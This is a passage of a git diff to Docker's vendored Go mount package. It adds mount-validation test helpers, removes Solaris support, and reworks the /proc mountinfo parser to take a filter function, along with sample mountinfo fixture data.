t.Fatal(err) + } + }() + } + if strings.Contains(tc.options, "remount") { + // create a new mount to remount first + if err := Mount("tmpfs", target, "tmpfs", ""); err != nil { + t.Fatal(err) + } + } + if err := Mount(tc.source, target, tc.ftype, tc.options); err != nil { + t.Fatal(err) + } + defer ensureUnmount(t, target) + validateMount(t, target, tc.expectedOpts, tc.expectedOptional, tc.expectedVFS) + }) + } +} + +// ensureUnmount umounts mnt checking for errors +func ensureUnmount(t *testing.T, mnt string) { + if err := Unmount(mnt); err != nil { + t.Error(err) + } +} + +// validateMount checks that mnt has the given options +func validateMount(t *testing.T, mnt string, opts, optional, vfs string) { + info, err := GetMounts(nil) + if err != nil { + t.Fatal(err) + } + + wantedOpts := make(map[string]struct{}) + if opts != "" { + for _, opt := range strings.Split(opts, ",") { + wantedOpts[opt] = struct{}{} + } + } + + wantedOptional := make(map[string]struct{}) + if optional != "" { + for _, opt := range strings.Split(optional, ",") { + wantedOptional[opt] = struct{}{} + } + } + + wantedVFS := make(map[string]struct{}) + if vfs != "" { + for _, opt := range strings.Split(vfs, ",") { + wantedVFS[opt] = struct{}{} + } + } + + mnts := make(map[int]*Info, len(info)) + for _, mi := range info { + mnts[mi.ID] = mi + } + + for _, mi := range info { + if mi.Mountpoint != mnt { + continue + } + + // Use parent info as the defaults + p := mnts[mi.Parent] + pOpts := make(map[string]struct{}) + if p.Opts != "" { + for _, opt := range strings.Split(p.Opts, ",") { + pOpts[clean(opt)] = struct{}{} + } + } + pOptional := make(map[string]struct{}) + if p.Optional != "" { + for _, field := range strings.Split(p.Optional, ",") { + pOptional[clean(field)] = struct{}{} + } + } + + // Validate Opts + if mi.Opts != "" { + for _, opt := range strings.Split(mi.Opts, ",") { + opt = clean(opt) + if !has(wantedOpts, opt) && !has(pOpts, opt) { + t.Errorf("unexpected mount option %q, expected %q", opt, opts) + } + delete(wantedOpts, opt) + } + } + for opt := range wantedOpts { + t.Errorf("missing mount option %q, found %q", opt, mi.Opts) + } + + // Validate Optional + if mi.Optional != "" { + for _, field := range strings.Split(mi.Optional, ",") { + field = clean(field) + if !has(wantedOptional, field) && !has(pOptional, field) { + t.Errorf("unexpected optional field %q, expected %q", field, optional) + } + delete(wantedOptional, field) + } + } + for field := range wantedOptional { + t.Errorf("missing optional field %q, found %q", field, mi.Optional) + } + + // Validate VFS if set + if vfs != "" { + if mi.VfsOpts != "" { + for _, opt := range strings.Split(mi.VfsOpts, ",") { + opt = clean(opt) + if !has(wantedVFS, opt) && opt != "seclabel" { // can be added by selinux + t.Errorf("unexpected vfs option %q, expected %q", opt, vfs) + } + delete(wantedVFS, opt) + } + } + for opt := range wantedVFS { + t.Errorf("missing vfs option %q, found %q", opt, mi.VfsOpts) + } + } + + return + } + + t.Errorf("failed to find mount %q", mnt) +} + +// clean strips off any value param after the colon +func clean(v string) string { + return strings.SplitN(v, ":", 2)[0] +} + +// has returns true if key is a member of m +func has(m map[string]struct{}, key string) bool { + _, ok := m[key] + return ok +} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go b/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go deleted file mode 100644 index c684aa81fc..0000000000 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_solaris.go +++ /dev/null @@ -1,33 +0,0 @@ -// +build solaris,cgo - -package mount - -import ( - "golang.org/x/sys/unix" - "unsafe" -) - -// #include -// #include -// #include -// int Mount(const char *spec, const char *dir, int mflag, -// char *fstype, char *dataptr, int datalen, char *optptr, int optlen) { -// return mount(spec, dir, mflag, fstype, dataptr, datalen, optptr, optlen); -// } -import "C" - -func mount(device, target, mType string, flag uintptr, data string) error { - spec := C.CString(device) - dir := C.CString(target) - fstype := C.CString(mType) - _, err := C.Mount(spec, dir, C.int(flag), fstype, nil, 0, nil, 0) - C.free(unsafe.Pointer(spec)) - C.free(unsafe.Pointer(dir)) - C.free(unsafe.Pointer(fstype)) - return err -} - -func unmount(target string, flag int) error { - err := unix.Unmount(target, flag) - return err -} diff --git a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go index a2a3bb457f..1428dffa52 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/mount/mounter_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!freebsd,!solaris freebsd,!cgo solaris,!cgo +// +build !linux,!freebsd freebsd,!cgo -package mount +package mount // import "github.com/docker/docker/pkg/mount" func mount(device, target, mType string, flag uintptr, data string) error { panic("Not implemented") diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go index e3fc3535e9..ecd03fc022 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo.go @@ -1,4 +1,4 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" // Info reveals information about a particular mounted filesystem. This // struct is populated from the content in the /proc//mountinfo file. diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go index 4f32edcd90..36c89dc1a2 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_freebsd.go @@ -1,4 +1,4 @@ -package mount +package mount // import "github.com/docker/docker/pkg/mount" /* #include @@ -15,7 +15,7 @@ import ( // Parse /proc/self/mountinfo because comparing Dev and ino does not work from // bind mounts. -func parseMountTable() ([]*Info, error) { +func parseMountTable(filter FilterFunc) ([]*Info, error) { var rawEntries *C.struct_statfs count := int(C.getmntinfo(&rawEntries, C.MNT_WAIT)) @@ -32,10 +32,24 @@ func parseMountTable() ([]*Info, error) { var out []*Info for _, entry := range entries { var mountinfo Info + var skip, stop bool mountinfo.Mountpoint = C.GoString(&entry.f_mntonname[0]) + + if filter != nil { + // filter out entries we're not interested in + skip, stop = filter(p) + if skip { + continue + } + } + mountinfo.Source = C.GoString(&entry.f_mntfromname[0]) mountinfo.Fstype = C.GoString(&entry.f_fstypename[0]) + out = append(out, &mountinfo) + if stop { + break + } } return out, nil } diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go index be69fee1d7..c1dba01fc3 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux.go @@ -1,86 +1,123 @@ -// +build linux - -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "bufio" "fmt" "io" "os" + "strconv" "strings" ) -const ( - /* 36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue - (1)(2)(3) (4) (5) (6) (7) (8) (9) (10) (11) +func parseInfoFile(r io.Reader, filter FilterFunc) ([]*Info, error) { + s := bufio.NewScanner(r) + out := []*Info{} + for s.Scan() { + if err := s.Err(); err != nil { + return nil, err + } + /* + 36 35 98:0 /mnt1 /mnt2 rw,noatime master:1 - ext3 /dev/root rw,errors=continue + (1)(2)(3) (4) (5) (6) (7) (8) (9) (10) (11) - (1) mount ID: unique identifier of the mount (may be reused after umount) - (2) parent ID: ID of parent (or of self for the top of the mount tree) - (3) major:minor: value of st_dev for files on filesystem - (4) root: root of the mount within the filesystem - (5) mount point: mount point relative to the process's root - (6) mount options: per mount options - (7) optional fields: zero or more fields of the form "tag[:value]" - (8) separator: marks the end of the optional fields - (9) filesystem type: name of filesystem of the form "type[.subtype]" - (10) mount source: filesystem specific information or "none" - (11) super options: per super block options*/ - mountinfoFormat = "%d %d %d:%d %s %s %s %s" -) + (1) mount ID: unique identifier of the mount (may be reused after umount) + (2) parent ID: ID of parent (or of self for the top of the mount tree) + (3) major:minor: value of st_dev for files on filesystem + (4) root: root of the mount within the filesystem + (5) mount point: mount point relative to the process's root + (6) mount options: per mount options + (7) optional fields: zero or more fields of the form "tag[:value]" + (8) separator: marks the end of the optional fields + (9) filesystem type: name of filesystem of the form "type[.subtype]" + (10) mount source: filesystem specific information or "none" + (11) super options: per super block options + */ -// Parse /proc/self/mountinfo because comparing Dev and ino does not work from -// bind mounts -func parseMountTable() ([]*Info, error) { - f, err := os.Open("/proc/self/mountinfo") - if err != nil { - return nil, err - } - defer f.Close() + text := s.Text() + fields := strings.Split(text, " ") + numFields := len(fields) + if numFields < 10 { + // should be at least 10 fields + return nil, fmt.Errorf("Parsing '%s' failed: not enough fields (%d)", text, numFields) + } - return parseInfoFile(f) -} + p := &Info{} + // ignore any numbers parsing errors, as there should not be any + p.ID, _ = strconv.Atoi(fields[0]) + p.Parent, _ = strconv.Atoi(fields[1]) + mm := strings.Split(fields[2], ":") + if len(mm) != 2 { + return nil, fmt.Errorf("Parsing '%s' failed: unexpected minor:major pair %s", text, mm) + } + p.Major, _ = strconv.Atoi(mm[0]) + p.Minor, _ = strconv.Atoi(mm[1]) -func parseInfoFile(r io.Reader) ([]*Info, error) { - var ( - s = bufio.NewScanner(r) - out = []*Info{} - ) + p.Root = fields[3] + p.Mountpoint = fields[4] + p.Opts = fields[5] - for s.Scan() { - if err := s.Err(); err != nil { - return nil, err + var skip, stop bool + if filter != nil { + // filter out entries we're not interested in + skip, stop = filter(p) + if skip { + continue + } } - var ( - p = &Info{} - text = s.Text() - optionalFields string - ) - - if _, err := fmt.Sscanf(text, mountinfoFormat, - &p.ID, &p.Parent, &p.Major, &p.Minor, - &p.Root, &p.Mountpoint, &p.Opts, &optionalFields); err != nil { - return nil, fmt.Errorf("Scanning '%s' failed: %s", text, err) + // one or more optional fields, when a separator (-) + i := 6 + for ; i < numFields && fields[i] != "-"; i++ { + switch i { + case 6: + p.Optional = fields[6] + default: + /* NOTE there might be more optional fields before the such as + fields[7]...fields[N] (where N < sepIndex), although + as of Linux kernel 4.15 the only known ones are + mount propagation flags in fields[6]. The correct + behavior is to ignore any unknown optional fields. + */ + break + } } - // Safe as mountinfo encodes mountpoints with spaces as \040. - index := strings.Index(text, " - ") - postSeparatorFields := strings.Fields(text[index+3:]) - if len(postSeparatorFields) < 3 { - return nil, fmt.Errorf("Error found less than 3 fields post '-' in %q", text) + if i == numFields { + return nil, fmt.Errorf("Parsing '%s' failed: missing separator ('-')", text) } - if optionalFields != "-" { - p.Optional = optionalFields + // There should be 3 fields after the separator... + if i+4 > numFields { + return nil, fmt.Errorf("Parsing '%s' failed: not enough fields after a separator", text) } + // ... but in Linux <= 3.9 mounting a cifs with spaces in a share name + // (like "//serv/My Documents") _may_ end up having a space in the last field + // of mountinfo (like "unc=//serv/My Documents"). Since kernel 3.10-rc1, cifs + // option unc= is ignored, so a space should not appear. In here we ignore + // those "extra" fields caused by extra spaces. + p.Fstype = fields[i+1] + p.Source = fields[i+2] + p.VfsOpts = fields[i+3] - p.Fstype = postSeparatorFields[0] - p.Source = postSeparatorFields[1] - p.VfsOpts = strings.Join(postSeparatorFields[2:], " ") out = append(out, p) + if stop { + break + } } return out, nil } +// Parse /proc/self/mountinfo because comparing Dev and ino does not work from +// bind mounts +func parseMountTable(filter FilterFunc) ([]*Info, error) { + f, err := os.Open("/proc/self/mountinfo") + if err != nil { + return nil, err + } + defer f.Close() + + return parseInfoFile(f, filter) +} + // PidMountInfo collects the mounts for a specific process ID. If the process // ID is unknown, it is better to use `GetMounts` which will inspect // "/proc/self/mountinfo" instead. @@ -91,5 +128,5 @@ func PidMountInfo(pid int) ([]*Info, error) { } defer f.Close() - return parseInfoFile(f) + return parseInfoFile(f, nil) } diff --git a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go index bd100e1d49..64411ccaef 100644 --- a/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go +++ b/vendor/github.com/docker/docker/pkg/mount/mountinfo_linux_test.go @@ -1,71 +1,73 @@ // +build linux -package mount +package mount // import "github.com/docker/docker/pkg/mount" import ( "bytes" "testing" + + "gotest.tools/assert" ) const ( fedoraMountinfo = `15 35 0:3 / /proc rw,nosuid,nodev,noexec,relatime shared:5 - proc proc rw - 16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel - 17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755 - 18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw - 19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw - 20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs rw,seclabel - 21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000 - 22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755 - 23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755 - 24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd - 25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw - 26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children - 27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children - 28 23 0:23 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children - 29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children - 30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children - 31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children - 32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children - 33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children - 34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children - 35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered - 36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct - 37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel - 38 35 0:31 / /tmp rw shared:24 - tmpfs tmpfs rw,seclabel - 39 17 0:32 / /dev/hugepages rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel - 40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw - 41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw - 42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw - 43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw - 45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered - 46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered - 47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered - 48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot rw,seclabel,data=ordered - 121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000 - 124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw - 165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered - 167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered - 171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered - 175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 /dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered - 179 35 253:18 / /var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered - 183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered - 187 35 253:20 / /var/lib/docker/devicemapper/mnt/8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,relatime shared:169 - ext4 /dev/mapper/docker-253:2-425882-8d9df91c4cca5aef49eeb2725292aab324646f723a7feab56be34c2ad08268e1 rw,seclabel,discard,stripe=16,data=ordered - 191 35 253:21 / /var/lib/docker/devicemapper/mnt/c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,relatime shared:173 - ext4 /dev/mapper/docker-253:2-425882-c8240b768603d32e920d365dc9d1dc2a6af46cd23e7ae819947f969e1b4ec661 rw,seclabel,discard,stripe=16,data=ordered - 195 35 253:22 / /var/lib/docker/devicemapper/mnt/2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,relatime shared:177 - ext4 /dev/mapper/docker-253:2-425882-2eb3a01278380bbf3ed12d86ac629eaa70a4351301ee307a5cabe7b5f3b1615f rw,seclabel,discard,stripe=16,data=ordered - 199 35 253:23 / /var/lib/docker/devicemapper/mnt/37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,relatime shared:181 - ext4 /dev/mapper/docker-253:2-425882-37a17fb7c9d9b80821235d5f2662879bd3483915f245f9b49cdaa0e38779b70b rw,seclabel,discard,stripe=16,data=ordered - 203 35 253:24 / /var/lib/docker/devicemapper/mnt/aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,relatime shared:185 - ext4 /dev/mapper/docker-253:2-425882-aea459ae930bf1de913e2f29428fd80ee678a1e962d4080019d9f9774331ee2b rw,seclabel,discard,stripe=16,data=ordered - 207 35 253:25 / /var/lib/docker/devicemapper/mnt/928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,relatime shared:189 - ext4 /dev/mapper/docker-253:2-425882-928ead0bc06c454bd9f269e8585aeae0a6bd697f46dc8754c2a91309bc810882 rw,seclabel,discard,stripe=16,data=ordered - 211 35 253:26 / /var/lib/docker/devicemapper/mnt/0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,relatime shared:193 - ext4 /dev/mapper/docker-253:2-425882-0f284d18481d671644706e7a7244cbcf63d590d634cc882cb8721821929d0420 rw,seclabel,discard,stripe=16,data=ordered - 215 35 253:27 / /var/lib/docker/devicemapper/mnt/d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,relatime shared:197 - ext4 /dev/mapper/docker-253:2-425882-d9dd16722ab34c38db2733e23f69e8f4803ce59658250dd63e98adff95d04919 rw,seclabel,discard,stripe=16,data=ordered - 219 35 253:28 / /var/lib/docker/devicemapper/mnt/bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,relatime shared:201 - ext4 /dev/mapper/docker-253:2-425882-bc4500479f18c2c08c21ad5282e5f826a016a386177d9874c2764751c031d634 rw,seclabel,discard,stripe=16,data=ordered - 223 35 253:29 / /var/lib/docker/devicemapper/mnt/7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,relatime shared:205 - ext4 /dev/mapper/docker-253:2-425882-7770c8b24eb3d5cc159a065910076938910d307ab2f5d94e1dc3b24c06ee2c8a rw,seclabel,discard,stripe=16,data=ordered - 227 35 253:30 / /var/lib/docker/devicemapper/mnt/c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,relatime shared:209 - ext4 /dev/mapper/docker-253:2-425882-c280cd3d0bf0aa36b478b292279671624cceafc1a67eaa920fa1082601297adf rw,seclabel,discard,stripe=16,data=ordered - 231 35 253:31 / /var/lib/docker/devicemapper/mnt/8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,relatime shared:213 - ext4 /dev/mapper/docker-253:2-425882-8b59a7d9340279f09fea67fd6ad89ddef711e9e7050eb647984f8b5ef006335f rw,seclabel,discard,stripe=16,data=ordered - 235 35 253:32 / /var/lib/docker/devicemapper/mnt/1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,relatime shared:217 - ext4 /dev/mapper/docker-253:2-425882-1a28059f29eda821578b1bb27a60cc71f76f846a551abefabce6efd0146dce9f rw,seclabel,discard,stripe=16,data=ordered - 239 35 253:33 / /var/lib/docker/devicemapper/mnt/e9aa60c60128cad1 rw,relatime shared:221 - ext4 /dev/mapper/docker-253:2-425882-e9aa60c60128cad1 rw,seclabel,discard,stripe=16,data=ordered - 243 35 253:34 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,relatime shared:225 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d-init rw,seclabel,discard,stripe=16,data=ordered - 247 35 253:35 / /var/lib/docker/devicemapper/mnt/5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,relatime shared:229 - ext4 /dev/mapper/docker-253:2-425882-5fec11304b6f4713fea7b6ccdcc1adc0a1966187f590fe25a8227428a8df275d rw,seclabel,discard,stripe=16,data=ordered - 31 21 0:23 / /DATA/foo_bla_bla rw,relatime - cifs //foo/BLA\040BLA\040BLA/ rw,sec=ntlm,cache=loose,unc=\\foo\BLA BLA BLA,username=my_login,domain=mydomain.com,uid=12345678,forceuid,gid=12345678,forcegid,addr=10.1.30.10,file_mode=0755,dir_mode=0755,nounix,rsize=61440,wsize=65536,actimeo=1` +16 35 0:14 / /sys rw,nosuid,nodev,noexec,relatime shared:6 - sysfs sysfs rw,seclabel +17 35 0:5 / /dev rw,nosuid shared:2 - devtmpfs devtmpfs rw,seclabel,size=8056484k,nr_inodes=2014121,mode=755 +18 16 0:15 / /sys/kernel/security rw,nosuid,nodev,noexec,relatime shared:7 - securityfs securityfs rw +19 16 0:13 / /sys/fs/selinux rw,relatime shared:8 - selinuxfs selinuxfs rw +20 17 0:16 / /dev/shm rw,nosuid,nodev shared:3 - tmpfs tmpfs rw,seclabel +21 17 0:10 / /dev/pts rw,nosuid,noexec,relatime shared:4 - devpts devpts rw,seclabel,gid=5,mode=620,ptmxmode=000 +22 35 0:17 / /run rw,nosuid,nodev shared:21 - tmpfs tmpfs rw,seclabel,mode=755 +23 16 0:18 / /sys/fs/cgroup rw,nosuid,nodev,noexec shared:9 - tmpfs tmpfs rw,seclabel,mode=755 +24 23 0:19 / /sys/fs/cgroup/systemd rw,nosuid,nodev,noexec,relatime shared:10 - cgroup cgroup rw,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd +25 16 0:20 / /sys/fs/pstore rw,nosuid,nodev,noexec,relatime shared:20 - pstore pstore rw +26 23 0:21 / /sys/fs/cgroup/cpuset rw,nosuid,nodev,noexec,relatime shared:11 - cgroup cgroup rw,cpuset,clone_children +27 23 0:22 / /sys/fs/cgroup/cpu,cpuacct rw,nosuid,nodev,noexec,relatime shared:12 - cgroup cgroup rw,cpuacct,cpu,clone_children +28 23 0:23 / /sys/fs/cgroup/memory rw,nosuid,nodev,noexec,relatime shared:13 - cgroup cgroup rw,memory,clone_children +29 23 0:24 / /sys/fs/cgroup/devices rw,nosuid,nodev,noexec,relatime shared:14 - cgroup cgroup rw,devices,clone_children +30 23 0:25 / /sys/fs/cgroup/freezer rw,nosuid,nodev,noexec,relatime shared:15 - cgroup cgroup rw,freezer,clone_children +31 23 0:26 / /sys/fs/cgroup/net_cls rw,nosuid,nodev,noexec,relatime shared:16 - cgroup cgroup rw,net_cls,clone_children +32 23 0:27 / /sys/fs/cgroup/blkio rw,nosuid,nodev,noexec,relatime shared:17 - cgroup cgroup rw,blkio,clone_children +33 23 0:28 / /sys/fs/cgroup/perf_event rw,nosuid,nodev,noexec,relatime shared:18 - cgroup cgroup rw,perf_event,clone_children +34 23 0:29 / /sys/fs/cgroup/hugetlb rw,nosuid,nodev,noexec,relatime shared:19 - cgroup cgroup rw,hugetlb,clone_children +35 1 253:2 / / rw,relatime shared:1 - ext4 /dev/mapper/ssd-root--f20 rw,seclabel,data=ordered +36 15 0:30 / /proc/sys/fs/binfmt_misc rw,relatime shared:22 - autofs systemd-1 rw,fd=38,pgrp=1,timeout=300,minproto=5,maxproto=5,direct +37 17 0:12 / /dev/mqueue rw,relatime shared:23 - mqueue mqueue rw,seclabel +38 35 0:31 / /tmp rw shared:24 - tmpfs tmpfs rw,seclabel +39 17 0:32 / /dev/hugepages rw,relatime shared:25 - hugetlbfs hugetlbfs rw,seclabel +40 16 0:7 / /sys/kernel/debug rw,relatime shared:26 - debugfs debugfs rw +41 16 0:33 / /sys/kernel/config rw,relatime shared:27 - configfs configfs rw +42 35 0:34 / /var/lib/nfs/rpc_pipefs rw,relatime shared:28 - rpc_pipefs sunrpc rw +43 15 0:35 / /proc/fs/nfsd rw,relatime shared:29 - nfsd sunrpc rw +45 35 8:17 / /boot rw,relatime shared:30 - ext4 /dev/sdb1 rw,seclabel,data=ordered +46 35 253:4 / /home rw,relatime shared:31 - ext4 /dev/mapper/ssd-home rw,seclabel,data=ordered +47 35 253:5 / /var/lib/libvirt/images rw,noatime,nodiratime shared:32 - ext4 /dev/mapper/ssd-virt rw,seclabel,discard,data=ordered +48 35 253:12 / /mnt/old rw,relatime shared:33 - ext4 /dev/mapper/HelpDeskRHEL6-FedoraRoot rw,seclabel,data=ordered +121 22 0:36 / /run/user/1000/gvfs rw,nosuid,nodev,relatime shared:104 - fuse.gvfsd-fuse gvfsd-fuse rw,user_id=1000,group_id=1000 +124 16 0:37 / /sys/fs/fuse/connections rw,relatime shared:107 - fusectl fusectl rw +165 38 253:3 / /tmp/mnt rw,relatime shared:147 - ext4 /dev/mapper/ssd-root rw,seclabel,data=ordered +167 35 253:15 / /var/lib/docker/devicemapper/mnt/aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,relatime shared:149 - ext4 /dev/mapper/docker-253:2-425882-aae4076022f0e2b80a2afbf8fc6df450c52080191fcef7fb679a73e6f073e5c2 rw,seclabel,discard,stripe=16,data=ordered +171 35 253:16 / /var/lib/docker/devicemapper/mnt/c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,relatime shared:153 - ext4 /dev/mapper/docker-253:2-425882-c71be651f114db95180e472f7871b74fa597ee70a58ccc35cb87139ddea15373 rw,seclabel,discard,stripe=16,data=ordered +175 35 253:17 / /var/lib/docker/devicemapper/mnt/1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,relatime shared:157 - ext4 /dev/mapper/docker-253:2-425882-1bac6ab72862d2d5626560df6197cf12036b82e258c53d981fa29adce6f06c3c rw,seclabel,discard,stripe=16,data=ordered +179 35 253:18 / /var/lib/docker/devicemapper/mnt/d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,relatime shared:161 - ext4 /dev/mapper/docker-253:2-425882-d710a357d77158e80d5b2c55710ae07c94e76d34d21ee7bae65ce5418f739b09 rw,seclabel,discard,stripe=16,data=ordered +183 35 253:19 / /var/lib/docker/devicemapper/mnt/6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,relatime shared:165 - ext4 /dev/mapper/docker-253:2-425882-6479f52366114d5f518db6837254baab48fab39f2ac38d5099250e9a6ceae6c7 rw,seclabel,discard,stripe=16,data=ordered +187 35 253:20 / 